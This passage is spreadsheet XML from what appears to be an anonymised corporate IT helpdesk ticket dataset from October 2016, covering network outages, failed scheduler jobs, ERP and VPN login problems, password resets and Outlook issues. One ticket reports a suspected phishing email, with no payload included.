    <t>network outage: site engineering_toolkuznetsk, russia is down since 6:41 am et on 10/05</t>
  </si>
  <si>
    <t>what type of outage:  ____x_network     _____circuit     _____power (please specify what type of outage)_x000D_
_x000D_
1. top 23 cert site   ?    __no_______     (yes/no/na) _x000D_
_x000D_
2. when did it start  ?   ______________ 6:41 am et on 10/05________x000D_
_x000D_
3.  scheduled maintenance ( power) ? ____no___    (yes/no/na)     company power  _________     provider power __________x000D_
                _x000D_
4.  scheduled maintenance ( network) ? _____no__    (yes/no/na)     company maint________ (yes/no)       provider maint/ticket #__________________    _x000D_
_x000D_
5. does site have a backup circuit ?  ___no___    (yes/no/na) _x000D_
_x000D_
6. backup circuit active ?   _______na    (yes/no/na) _x000D_
_x000D_
7. site contact notified (phone/email) ?  _________     (yes/no/na) _x000D_
_x000D_
8. remote dial-in ?   _________na__   (yes/no/na) _x000D_
_x000D_
9. equipment reset ?    ______na_____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</si>
  <si>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probleme mit vpn \weszfyok fbadnjhu</t>
  </si>
  <si>
    <t>probleme mit portal \franjuz urbghty</t>
  </si>
  <si>
    <t>petljhxi bocxgins</t>
  </si>
  <si>
    <t>erp SID_34 account unlock and password reset for bowtniuy.afgdmesz@gmail.com</t>
  </si>
  <si>
    <t>russia: interface: vlan1 Â· russia engineering_tool wharehouse lan on company-eu-rus-engineering_toolkuznetsk-dmvpn-891-rtr01.company.com is down</t>
  </si>
  <si>
    <t>russia:  interface: vlan1 Â· russia engineering_tool wharehouse lan on company-eu-rus-engineering_toolkuznetsk-dmvpn-891-rtr01.company.com is down</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_1142 failed in job_scheduler at: 10/05/2016 06:11:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_1142 failed in job_scheduler at: 10/05/2016 06:11:00</t>
  </si>
  <si>
    <t xml:space="preserve">problem in outlook client database synchronizing </t>
  </si>
  <si>
    <t>enhjdypo rsbxiepn</t>
  </si>
  <si>
    <t>microsoft outlook issue</t>
  </si>
  <si>
    <t xml:space="preserve">hi team,_x000D_
_x000D_
i am unable to get mails intermittently during these time i need to update the folder to get the mails, sometimes it does not work like that too. can you please look into this issue. </t>
  </si>
  <si>
    <t>wczegmok bgqoclvs</t>
  </si>
  <si>
    <t>upgrade to office 2016</t>
  </si>
  <si>
    <t>currently there are two versions of office on my computer installed - office 2013 in the 64 bit folder and office 2013 in the 32 bit folder._x000D_
pls delete the old 2013 and repair the new one.</t>
  </si>
  <si>
    <t>zmnhfcbv azdnkmul</t>
  </si>
  <si>
    <t>erp intercompany inwarehouse_tool issue sto - 4908197080</t>
  </si>
  <si>
    <t xml:space="preserve">from: batia ben-shloosh 
sent: wednesday, september 28, 2016 8:06 pm
to:huji uhytry; rujteoza mcoswhjuanthila; yayuel sayatgr
cc: hkfipags sdilxrfk; rzucjgvp ioqjgmah; jhdythua htayhil; udmbwocs kegsjdva
subject: re: mm6599468 - d.n. 9169446361
hello ,
please find the lauacyltoe hxgaycze sto - 5019208191.
please be informed that the same currency problem has occurred on a new shipment under the above d.n.
for 8 pcs mm6599468 under d.n. 9169446361  the inwarehouse_tool 0811166205 show the total amount of us$ 71.80.15.0712, the real value which show on the sto number 5019286181  is 126.61$ for each.
please check the issue urgently,   the shipment is currently hold in our warehouse.
please see the below correspondence on the previous shipment from june 2016.
</t>
  </si>
  <si>
    <t>login is not possible ??</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: lgeuniqf.ijsnyxgf@gmail.com
hallo kollegen,
bitte mal prÃ¼fen, warum der kollege diehm diese frage gestellt bekommt auf nein klickt &amp; sich dann nicht einloggen kann?
dank &amp; gruÃŸ
[cid:hardcopy-cid]
</t>
  </si>
  <si>
    <t>lgeuniqf ijsnyxgf</t>
  </si>
  <si>
    <t>erp user id &amp; password not working</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: ploxzuts.utvimnwo@gmail.com_x000D_
_x000D_
dear sir/madam,_x000D_
_x000D_
pl do the needful regarding the subject matheywter (message shown is wrong user id &amp; password )_x000D_
_x000D_
fyi &amp; na_x000D_
_x000D_
warm </t>
  </si>
  <si>
    <t>could not logon to erp via vpn</t>
  </si>
  <si>
    <t>error message in both systems SID_34 / SID_1:_x000D_
_x000D_
partner 62.157.140.133:3200 not reached. error no 10061: connection refused</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_593 failed in job_scheduler at: 10/05/2016 04:17:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_593 failed in job_scheduler at: 10/05/2016 04:17:00</t>
  </si>
  <si>
    <t>please create dn from plant_105 to plant_212 on 1 pc of mm3954300</t>
  </si>
  <si>
    <t>we can not create please create dn from plant_105 to plant_212 on 1 pc of mm4065411? urgent  - shipping point dns1.</t>
  </si>
  <si>
    <t>ylitqvaj ljxdfhus</t>
  </si>
  <si>
    <t>lean certificates not getting sent automatically</t>
  </si>
  <si>
    <t xml:space="preserve">hi khadfhty,
today, i created another lean event but still the certificates are not sent automatically to the recipient's. i can see the certificates in the certificate list section. also, co-facilitator 2 name is not appearing in the certificate. same happened for the past event too.
request you to kindly fix this issue on priority.
</t>
  </si>
  <si>
    <t>probleme mit alicona nach update \jionmpsf wnkpzcmv</t>
  </si>
  <si>
    <t>setup we_wu73 \jionmpsf wnkpzcmv</t>
  </si>
  <si>
    <t xml:space="preserve">chg1145744 - stop the reminders </t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: atdclmyi.wqxzaysu@gmail.com_x000D_
_x000D_
hello ,_x000D_
_x000D_
i have received ten mails so far on approval of the above ticket . sample mail attached . pl take immediate steps to stop these reminders as i have already approved the ticket._x000D_
_x000D_
_x000D_
_x000D_
best </t>
  </si>
  <si>
    <t>atdclmyi wqxzaysu</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: uijxpazn.gvtzlphs@gmail.com
dear all,
could you please reset password for dpajkrhy hwvjympt (websty12) immediately and let me know.
best </t>
  </si>
  <si>
    <t xml:space="preserve">job Job_1351 failed in job_scheduler at: 10/05/2016 02:34:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_1351 failed in job_scheduler at: 10/05/2016 02:34:00</t>
  </si>
  <si>
    <t>issue with engineering_tooled software</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: ntuhoafg.bzwefjvk@gmail.com_x000D_
_x000D_
hello,_x000D_
_x000D_
i am not able to see option for creating new customer &amp; new dealer names in the engineering tool software, please help me to resolve the issue._x000D_
_x000D_
[cid:image001.jpg@01SID_35eff.5e2f2f10]_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>probleme beim zugriff auf zeichnungen - netweaver business clint</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: ecoljnvt.lbdqmvfs@gmail.com
sehr geehrte kollegen,
ich kann den netweaver business clint nicht Ã¶ffnen.
wenn ich auf die entsprechende app drÃ¼cke (Ã¼ber vpn bereits verbunden), dann kommt folgender hinweis:
[cid:image001.png@01SID_35ee0.18647971]
bitte um ihre unterstÃ¼tzung
mit freundlichen grÃ¼ÃŸen / best </t>
  </si>
  <si>
    <t xml:space="preserve">job Job_2049 failed in job_scheduler at: 10/05/2016 02:10:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_2049 failed in job_scheduler at: 10/05/2016 02:10:00</t>
  </si>
  <si>
    <t>outlook &amp; crm not getting sync</t>
  </si>
  <si>
    <t>zvenmiap kocjpnle</t>
  </si>
  <si>
    <t>seek support_network related issue.</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: utoegyqx.lhosidqg@gmail.com_x000D_
_x000D_
hello,_x000D_
_x000D_
i am not able to access erp and other files through network._x000D_
i am facing this problem from past 3 weeks on daily basis , the issues are  addressed to local it team and getting it resolved on case to case basis._x000D_
it is causing lot of disturbance ._x000D_
_x000D_
seek suppor to resolve the issue._x000D_
_x000D_
below is the error message when i tried to log in for SID_34._x000D_
_x000D_
[cid:image001.jpg@01SID_35ef9.a78c5e90]_x000D_
_x000D_
and each day when i connect to network i am connected to companyguest network, i need to change it to companysecure. after this also i am facing problems._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>utoegyqx lhosidqg</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_1384 failed in job_scheduler at: 10/05/2016 01:42:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_1384 failed in job_scheduler at: 10/05/2016 01:42:00</t>
  </si>
  <si>
    <t>interface: fastethernet0/2 Â· timeclock on clhr_toollant(41.10.34.08611 ) is down since 8:35pm on 10/04/16</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_1346 failed in job_scheduler at: 10/05/2016 01:40:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_1346 failed in job_scheduler at: 10/05/2016 01:40:00</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_1391 failed in job_scheduler at: 10/05/2016 01:39:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_1391 failed in job_scheduler at: 10/05/2016 01:39:00</t>
  </si>
  <si>
    <t>can't access erp by vpn</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: ovhtgsxd.dcqhnrmy@gmail.com
it help,
i can't login erp SID_34 from home by vpn with error message below,  can you help?
[cid:image001.png@01SID_35f0c.dcfb21c0]
juhu jojfufn
ap logistics manager
e: ovhtgsxd.dcqhnrmy@gmail.com&lt;mailto:ovhtgsxd.dcqhnrmy@gmail.com&gt;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t>
  </si>
  <si>
    <t>ey consultant is unable to login to citrix. attached the error screenshot.</t>
  </si>
  <si>
    <t>ey consultant is unable to login to citrix. attached the error screenshot._x000D_
kindly do the needful.</t>
  </si>
  <si>
    <t xml:space="preserve">unable to login to engineering tool </t>
  </si>
  <si>
    <t>rzikhjae tzekbfjx</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_2573 failed in job_scheduler at: 10/05/2016 00:02:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_2573 failed in job_scheduler at: 10/05/2016 00:02:00</t>
  </si>
  <si>
    <t>bslwfqcv xqaheoim</t>
  </si>
  <si>
    <t xml:space="preserve">australia, australia is currently experiencing very long loading times for erp. </t>
  </si>
  <si>
    <t>name:elituyt
language:
browser:microsoft internet explorer
email:byhtu_47@gmail.com
customer number:
telephone:
summary:australia, australia is currently experiencing very long loading times for erp. can you please look into this?</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: duoyrpvi.wgjpviul@gmail.com_x000D_
_x000D_
hi,_x000D_
_x000D_
my erp is running incredibly slow and it tries to load pages and then kicks me out with the below._x000D_
_x000D_
[cid:image001.png@01SID_35f0a.5f8ac670]_x000D_
_x000D_
kind, </t>
  </si>
  <si>
    <t>nehxmtpg xepltzqf</t>
  </si>
  <si>
    <t>erp very slow - happens every night starting at 9:45 pm</t>
  </si>
  <si>
    <t>name:fyzceglp vfnraqxc
language:
browser:microsoft internet explorer
email:fyzceglp.vfnraqxc@gmail.com
customer number:
telephone:
summary:erp very slow - happens every night starting at 9:45 pm</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_3052 failed in job_scheduler at: 10/04/2016 22:41:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_3052 failed in job_scheduler at: 10/04/2016 22:41:00</t>
  </si>
  <si>
    <t>vip-processed payment - potentional security attempt</t>
  </si>
  <si>
    <t xml:space="preserve">from: xmjwanes astmvqhc 
sent: wednesday, october 05, 2016 12:14 am
to: nwfodmhc exurcwkm
subject: rakthyesh fw: processed payment - potentional security attempt
do not open.......see the attached received earlier today.    
marc
xmjwanes astmvqhc
director, human resources
xmjwanes.astmvqhc@gmail.com
-----original message-----
from: ghyaniel@dealgce.com [mailto:ghyaniel@dealgce.com] 
sent: tuesday, october 04, 2016 12:56 pm
to: xmjwanes astmvqhc; naffwflie.hyhtard@kronsnwdg.com; agthynew@kw.com
subject: processed payment
i made a list with the items i need and can find on company.com do you offer discounts for bulk orders?
you can find my contact details and the item list attached.
</t>
  </si>
  <si>
    <t>xmjwanes astmvqhc</t>
  </si>
  <si>
    <t>window locked for user id - laijuttryhr</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: wyxqkzmf.urigtqnp@gmail.com_x000D_
_x000D_
hi help desk team_x000D_
_x000D_
my window id locked.  please assist to unlock immediately.  </t>
  </si>
  <si>
    <t>ticket update on inplant_866566</t>
  </si>
  <si>
    <t xml:space="preserve">job bkwin_HostName_768_inc failed in job_scheduler at: 10/04/2016 19:28:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job bkwin_HostName_768_inc failed in job_scheduler at: 10/04/2016 19:28:00</t>
  </si>
  <si>
    <t>ticket update on inplant_866142</t>
  </si>
  <si>
    <t>ticket update on inplant_866570</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_2573 failed in job_scheduler at: 10/04/2016 18:00:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_2573 failed in job_scheduler at: 10/04/2016 18:00:00</t>
  </si>
  <si>
    <t xml:space="preserve">missing owtlmpuv oicrjsfh in my team calendar page </t>
  </si>
  <si>
    <t xml:space="preserve">
received from: oetlgbfw.bsctrnwp@gmail.com
i am missing one person from my gl2 team on the calendar page
dthyan matheywtyuews
sales manager gl2
oetlgbfw.bsctrnwp@gmail.com&lt;mailto:oetlgbfw.bsctrnwp@gmail.com&gt;
</t>
  </si>
  <si>
    <t>unable to connect to vpn while updating passwords</t>
  </si>
  <si>
    <t>password expired</t>
  </si>
  <si>
    <t xml:space="preserve">ms crm dynamics error : outlook addin </t>
  </si>
  <si>
    <t>user wants crm mobile app to be donwloaded on mobile</t>
  </si>
  <si>
    <t>kupqvfaz mvcnylsx</t>
  </si>
  <si>
    <t>access denied to collaboration_platform.</t>
  </si>
  <si>
    <t xml:space="preserve">i cannot access or go to libraries in collaboration_platform. i need to access this for applications support calls and e-mails. i'm having to transfer to other members, or put the calls on hold while someone else may be available to search for me._x000D_
this is the message i am getting. _x000D_
_x000D_
if this problem persists, contact your support team and include these technical details: _x000D_
correlation id: eb36aa9d-a0d2-3000-b1d3-a16127465a9a _x000D_
date and time: 10/4/2016 12:53:18 pm _x000D_
user: wfzgituk.rxvqzopt@gmail.com _x000D_
issue type: user does not have permissions. </t>
  </si>
  <si>
    <t>wfzgituk rxvqzopt</t>
  </si>
  <si>
    <t>need crm added to outlook ribbon in microsoft outlook for crm mfg_tooltion</t>
  </si>
  <si>
    <t xml:space="preserve">power management query </t>
  </si>
  <si>
    <t>qftpazns fxpnytmk</t>
  </si>
  <si>
    <t>vip 2-unable to load collaboration_platform site</t>
  </si>
  <si>
    <t>unable to load collaboration_platform site</t>
  </si>
  <si>
    <t>company home page not loading</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: gvcfhwjy.lyxcorqb@gmail.com_x000D_
_x000D_
[cid:image001.jpg@01SID_35e4a.ce720dc0]_x000D_
_x000D_
best </t>
  </si>
  <si>
    <t>usa me access to : t:\finance\corporateaccounting\partner\cash &amp; bank reconciliations\misc. cash\account 10134141</t>
  </si>
  <si>
    <t xml:space="preserve">from: pjxclyhs fcniljtu 
sent: tuesday, october 04, 2016 6:59 pm
to: nwfodmhc exurcwkm
cc: jwoiyzfp zlftrkpq; liz domasky
subject: trupthyti fw: folder access -ticket_no1556086
please usa me read only access to the following folder:
t:\finance\corporateaccounting\partner\cash &amp; bank reconciliations\misc. cash\account 21245252
kind </t>
  </si>
  <si>
    <t>pjxclyhs fcniljtu</t>
  </si>
  <si>
    <t>lhqsm68267( patching_antivirus_sw  prod ):node lhqsm68267 located at usa is down since 3:04 pm et on 10/04.</t>
  </si>
  <si>
    <t>unable to load outlook</t>
  </si>
  <si>
    <t xml:space="preserve">collaboration_platform not working ; server is busy /unavailable </t>
  </si>
  <si>
    <t>royhtub haujtimpton,
unable to access crm thru outlook.</t>
  </si>
  <si>
    <t>dbroehva dgcyvxhw</t>
  </si>
  <si>
    <t>change of owner on collaboration_platform link</t>
  </si>
  <si>
    <t>kvrmnuix yicpojmf</t>
  </si>
  <si>
    <t xml:space="preserve">coffee spillage on keybankrd </t>
  </si>
  <si>
    <t>fwgdbatq qgownfkv</t>
  </si>
  <si>
    <t>can you please check â€“ marftgytin hÃ¶pfner (userid: hoepftyhum, # 59146) gets the crm error message when trying to open the "fore</t>
  </si>
  <si>
    <t>can you please check â€“ marftgytin hÃ¶pfner (userid: hoepftyhum, # 59146786) gets the crm error message when trying to open the "forecast to plan" dashbankrd.</t>
  </si>
  <si>
    <t>karoyclq ivlabkhu</t>
  </si>
  <si>
    <t>saved over excel file</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: qzixratf.wrygjncl@gmail.com_x000D_
_x000D_
i have accidentally 'saved as' an excel spreadsheet over another file. is there a way to recover to a few days ago?_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>qzixratf wrygjncl</t>
  </si>
  <si>
    <t>query on crm app</t>
  </si>
  <si>
    <t>dpcxyjlz fuqzbetw</t>
  </si>
  <si>
    <t>printer -08</t>
  </si>
  <si>
    <t>configure the id 08 printer on the laptop.</t>
  </si>
  <si>
    <t>kdhztcva smpynjae</t>
  </si>
  <si>
    <t>locked out of poruxnwb yfaqhceo</t>
  </si>
  <si>
    <t xml:space="preserve">received from: hwbukcsm.hwobikcv@gmail.com_x000D_
_x000D_
hi there,_x000D_
_x000D_
i tried changing my password in the poruxnwb yfaqhceo yesterday (oracle fusion middleware â€“ production 11g) and after entering my old and new passwords, the log in box kept popping up but did not let me log in. i somehow backed out of it and it let me access the system._x000D_
_x000D_
today neither the old or new password will work. i have had this happen in the past and szewiguc nvajphfm would unlock it for me._x000D_
_x000D_
can someone help me get this corrected?_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>hwbukcsm hwobikcv</t>
  </si>
  <si>
    <t>no audio on lat 7350</t>
  </si>
  <si>
    <t>circuit outage: south_amerirtca, south_amerirtca vpn router is down at 12:23 pm et on 10/04. site is up on primary.</t>
  </si>
  <si>
    <t>what type of outage:  _____network     __x___circuit     _____power (please specify what type of outage)_x000D_
_x000D_
1. top 23 cert site   ?    _____no    (yes/no/na) _x000D_
_x000D_
2. when did it start  ?   ______12:23 pm et on 10/04.________________x000D_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___na________   (yes/no/na) _x000D_
_x000D_
9. equipment reset ?    ______na_____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</si>
  <si>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issues with user profiles on HostName_108</t>
  </si>
  <si>
    <t xml:space="preserve">user profiles seem to be messed up on this server and not creating. when trying to investigate a monitoring_tool monitoring issue i came across the error message in the attached screenshot._x000D_
_x000D_
please investigate. </t>
  </si>
  <si>
    <t>boxrlpec fnkhwytl</t>
  </si>
  <si>
    <t>renew internal certificate for password_management_tool id password manager</t>
  </si>
  <si>
    <t xml:space="preserve">hello ,
as discussed, please assist on renewing the internal certificate for password_management_tool id password manager tool.
</t>
  </si>
  <si>
    <t>ticket upadate on :inplant_866142</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_1387 failed in job_scheduler at: 10/04/2016 11:17:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_1387 failed in job_scheduler at: 10/04/2016 11:17:00</t>
  </si>
  <si>
    <t>urgent : not able to share company catalog data with external user...</t>
  </si>
  <si>
    <t xml:space="preserve">
summary:who can help me with collaboration_platform issues?
i have shared directory and files on collaboration_platform with an external user, but it is telling me "only you" under the shared with column</t>
  </si>
  <si>
    <t>users at usa are not receiving inbound external calls</t>
  </si>
  <si>
    <t xml:space="preserve">users at usa are not receiving inbound external calls_x000D_
_x000D_
internal extension to extension calls are working and outbound calls are working _x000D_
</t>
  </si>
  <si>
    <t>missing email access:  k-amerirtcas.hrss@company.com</t>
  </si>
  <si>
    <t xml:space="preserve">i previously had access to the amerirtcas_hrssc mail box on outlook, but it is no longer available to me.  can this be re-set up?
vpksyfco chosuygq
</t>
  </si>
  <si>
    <t xml:space="preserve">unlock and reset password user ( vvamrtryot ) </t>
  </si>
  <si>
    <t xml:space="preserve">just to inform you that user vvamrtryot seems has expired the password in SID_21, SID_1, SID_34._x000D_
we couldn't proceed checking, can you also reset the password?_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">outlook stuck on processing </t>
  </si>
  <si>
    <t>erp gui is missing login options for xhaomnjl ctusaqpr</t>
  </si>
  <si>
    <t>xhaomnjl ctusaqpr called for erp account unlock</t>
  </si>
  <si>
    <t>windows acccount lockout</t>
  </si>
  <si>
    <t>rguyoajm zfcquswp</t>
  </si>
  <si>
    <t>update inwarehouse_tool documents from list for sales org 12032, 12035 and 12036</t>
  </si>
  <si>
    <t xml:space="preserve">with the germany office move the main inwarehouse_tool printer fd37v got temporarily totally deleted by accident from erp. a big bulk of inwarehouse_tools was already reissued, but there are billing documents dated august 26 - 29, 2016 that do not have any output yet at all. - see lists attached._x000D_
_x000D_
if an update is done on the billing via vf02, the correct output type gets automatically added. therefore we need to have a mass update done (just go to change mode and save), so that the missing printouts get added and issued to the appropriate printer. (billings with existing output might be amongst the list, these are good and no action is required.)_x000D_
_x000D_
*************_x000D_
important: *_x000D_
*************_x000D_
if the mass update is done, please don't do it any any regular billing job times and note the issued documents from erp spool. the list of billings attached might also have documents with output assigned to other printers than fd37v. these billings are correct._x000D_
accounting department, however, would need to have a list of all billings where the output now would get generated, as the customer might get reminders or dunnings for the same. we need to clearly trace these billing documents with output only now generated for audit reasons. we need to get the print outs as soon as possible. please help to support this request as soon as possible as some customers get annoyed with wrong dunnings._x000D_
_x000D_
if you have questions, don't hesitate to contact me. _x000D_
</t>
  </si>
  <si>
    <t>clients laptop will not turn on</t>
  </si>
  <si>
    <t>zhvrtnom waedkqzj</t>
  </si>
  <si>
    <t>rkimfqta oepigwmr</t>
  </si>
  <si>
    <t xml:space="preserve">product management master, key figures dierppear </t>
  </si>
  <si>
    <t xml:space="preserve">sample before refresh_x000D_
_x000D_
 _x000D_
_x000D_
_x000D_
after refresh_x000D_
_x000D_
 _x000D_
_x000D_
_x000D_
_x000D_
best </t>
  </si>
  <si>
    <t>uwofavej hxyatnjc</t>
  </si>
  <si>
    <t>i received an error when trying to log in to do my ethics for q2.</t>
  </si>
  <si>
    <t>error i received says "our records indicate your log in credentials used to access the site from the company's collaboration_platform do not match the records we have on file within the active directory."</t>
  </si>
  <si>
    <t>email address: dbryhtuown@task.com has been newly blocked from sending attachments. please remove the block.</t>
  </si>
  <si>
    <t>lkmhgiwv omkfxdcq</t>
  </si>
  <si>
    <t>erp font small.</t>
  </si>
  <si>
    <t>i've received a new laptop (latitude 7275), after the image installation the  (erp) has e very little definition. when i try to logon i can see only very little charatcher.. do you have some indications ?</t>
  </si>
  <si>
    <t>skype login after changing password</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: doxiqkws.uvrzcqmf@gmail.com_x000D_
_x000D_
hello,_x000D_
_x000D_
i recently changed my company network password (log in, email, vpn, etc.) and cannot sign in to skype for business anymore. i get a notification saying there was a problem acquiring a personal certificate:_x000D_
_x000D_
[cid:image001.png@01SID_35e11.eafad4b0]_x000D_
_x000D_
any assistance you can provide would be greatly appreciated._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>doxiqkws uvrzcqmf</t>
  </si>
  <si>
    <t>second monitor not working</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: iqcylpok.ascpqvni@gmail.com_x000D_
_x000D_
hello,_x000D_
_x000D_
my second monitor stopped working, cannot get a picture on it. can someone please come and take a look at it? </t>
  </si>
  <si>
    <t>iqcylpok ascpqvni</t>
  </si>
  <si>
    <t>reset the password for fueiklyv jargqpkm on erp / production / erp</t>
  </si>
  <si>
    <t>please reset my password for SID_34 erp production and SID_37 bw production</t>
  </si>
  <si>
    <t>fueiklyv jargqpkm</t>
  </si>
  <si>
    <t>i need removed from my profile</t>
  </si>
  <si>
    <t>i updated my profile in the new single sign on and yet still appears.  it has affected my number in outlook as well as anyone who has me in their contact list.  the only number that should be associated with my profile is .  if you do an employee search from outlook you will see the number.</t>
  </si>
  <si>
    <t>yrhnxpvi drlbzqpi</t>
  </si>
  <si>
    <t xml:space="preserve">    request to reset user's password   
   the following user in your organization has requested a password reset be performed for their account: 
â€¢ apokrfjv.mdiepcul@gmail.com 
â€¢ first name: donnathyr 
â€¢ last name: welling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</si>
  <si>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apokrfjv mdiepcul</t>
  </si>
  <si>
    <t>EU_tool ws ewew8323843 funktioniert nicht \jionmpsf wnkpzcmv</t>
  </si>
  <si>
    <t>bluescreen ewew8323733 \wrcktgbd wzrgyunp</t>
  </si>
  <si>
    <t xml:space="preserve">hallo ,_x000D_
_x000D_
mein pc zeigt blaue seite mit vielen weiÃŸen buchstaben._x000D_
pc nr. 212622_x000D_
typ: optiplex 790_x000D_
_x000D_
bitte helfen!_x000D_
_x000D_
best </t>
  </si>
  <si>
    <t>key figure dierppears -  urgent refer :inplant_866405</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: uwofavej.hxyatnjc@gmail.com_x000D_
_x000D_
while updating existing product management master, key figures dierppear and if shown in columns also columns dierppear and download is distrtgoyed_x000D_
_x000D_
last month we have had the same issue as anybody made changes on the product management master_x000D_
pallutyr pande corrected it back, maybe you can involve her again_x000D_
_x000D_
we are very bussy with month end  data and immediately need the correct settings as they have been before._x000D_
_x000D_
sample : before refresh_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
best </t>
  </si>
  <si>
    <t xml:space="preserve">skype issue : personal certificate error </t>
  </si>
  <si>
    <t xml:space="preserve">
    request to reset user's password   
   the following user in your organization has requested a password reset be performed for their account: 
â€¢ icyxtqej.lqsjrgzt@gmail.com 
â€¢ first name: hyeonthygwon 
â€¢ last name: lethre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</si>
  <si>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icyxtqej lqsjrgzt</t>
  </si>
  <si>
    <t>edrglpvu ihpzqksy</t>
  </si>
  <si>
    <t>system took a long time to respond after a password reset.</t>
  </si>
  <si>
    <t>system took a long time to respond after a password reset._x000D_
stack guard error came up with outlook.</t>
  </si>
  <si>
    <t>vncowmbd hyfzcqpi</t>
  </si>
  <si>
    <t xml:space="preserve">user lndypaqg dhqwtcsr (gogtyekthyto) hat sein passwort in erp SID_34 verggermany. </t>
  </si>
  <si>
    <t>qgopxabz xnuieqjr</t>
  </si>
  <si>
    <t>unable to connect to expense reimbursement webpage.</t>
  </si>
  <si>
    <t>unable to connect to expense reimbursement webpage._x000D_
page fails to load</t>
  </si>
  <si>
    <t>jziwhldq qslwyozu</t>
  </si>
  <si>
    <t>distributor_tool does not have a list of favorite customers</t>
  </si>
  <si>
    <t>issue occurred after a recent password change.</t>
  </si>
  <si>
    <t>jvpqlgib yuhcljqp</t>
  </si>
  <si>
    <t>gurts lrupiepens email forwarding</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: hpqjaory.gfrwmije@gmail.com
gurts lrupiepens left company's usa, il facility on september 30, 2016.
i am assuming partial responsibilities for gus. can you please set up email forwarding
for any correspondences to my email address?
please advise if there is anything else required on my part or my manager, xpoqcrtb zwrypjqv.
</t>
  </si>
  <si>
    <t>please reset my password for hana SID_60,SID_59,SID_58</t>
  </si>
  <si>
    <t>please reset my password for hana SID_60,SID_59,SID_58 for userid:bathishry</t>
  </si>
  <si>
    <t>erp password reset : erp SID_34</t>
  </si>
  <si>
    <t>ranjhczs qvcwptbr</t>
  </si>
  <si>
    <t>HostName_113 : rfcserver.exe process count service is down at 8:11 am et on 10/04.</t>
  </si>
  <si>
    <t>xceliron process where pos are auto received is not working as designed resulting in blocked inwarehouse_tools.</t>
  </si>
  <si>
    <t xml:space="preserve">xceliron process where pos are auto received is not working as designed resulting in blocked inwarehouse_tools resulting in additional work for the ap and buyer who cannot control this process.  please correct the missing goods receipts on the attached file and make a permanent correction so that goods receipts are done in a timely fashion going forward.  please do not close this ticket until a permanent fix is uacyltoe hxgayczeed and in place.  </t>
  </si>
  <si>
    <t>crm app on ios10</t>
  </si>
  <si>
    <t>schnafk - docking station needs replacement</t>
  </si>
  <si>
    <t>desk: 455 - cubicle number in the customer service department - usa
phone number: 
laptop model: latitude e5450
direct connection to monitors work, through docking station, no go.</t>
  </si>
  <si>
    <t>collaboration_platform access</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: frydqbgs.ugmnzfik@gmail.com
hello all,
the project documentation under the collaboration_platform links below is no longer accessible with error message
jaytya created it, but he left meanwhile, perhaps deactivation of his account could be the reason. anyway, please help to get access again or provide instruction to change owner. </t>
  </si>
  <si>
    <t>frydqbgs ugmnzfik</t>
  </si>
  <si>
    <t>sprzgqyv uxpjtgaw</t>
  </si>
  <si>
    <t>view drawing in engineering tool, erp gui and business_client take 3x as long as normal</t>
  </si>
  <si>
    <t xml:space="preserve">since a couple days we see huge performance issues in fue to view drawings from erp._x000D_
</t>
  </si>
  <si>
    <t>updation required in flash player</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: ipydfcqo.kdxsquzn@gmail.com_x000D_
_x000D_
hello,_x000D_
_x000D_
please find below compatibility check getting while launching ethics._x000D_
_x000D_
kindly go thru and do the needful._x000D_
_x000D_
[cid:image011.jpg@01SID_35e5d.aeae3550]_x000D_
_x000D_
system details is provided below for your quick view._x000D_
[cid:image012.png@01SID_35e5d.aeae3550]_x000D_
_x000D_
</t>
  </si>
  <si>
